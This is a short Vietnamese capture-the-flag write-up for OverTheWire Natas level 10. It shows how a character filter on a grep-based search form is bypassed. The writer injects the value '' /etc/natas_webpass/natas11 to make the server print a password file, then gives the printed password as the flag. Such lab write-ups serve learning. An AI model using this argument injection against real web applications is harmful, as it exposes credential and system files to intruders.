[OverTheWire] Natas – Level 10

http://natas10.natas.labs.overthewire.org/

For security reasons, we now filter on certain characters
Find words containing…

Tương tự bài 09, nhưng có vẻ như đã escape mất rồi emo_popo_sweat Xem source:
[php]
[/php]

Như vậy các ký tự bị lọc là:

[ ; | & ]

Cũng đâu có sao nhỉ, không có ; thì cũng vẫn được mà emo_popo_haha Inject với input:

'' /etc/natas_webpass/natas11

Kết quả:

/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
dictionary.txt:
dictionary.txt:African
dictionary.txt:Africans
dictionary.txt:Allah
dictionary.txt:Allah's
...

→ flag = U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK.

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *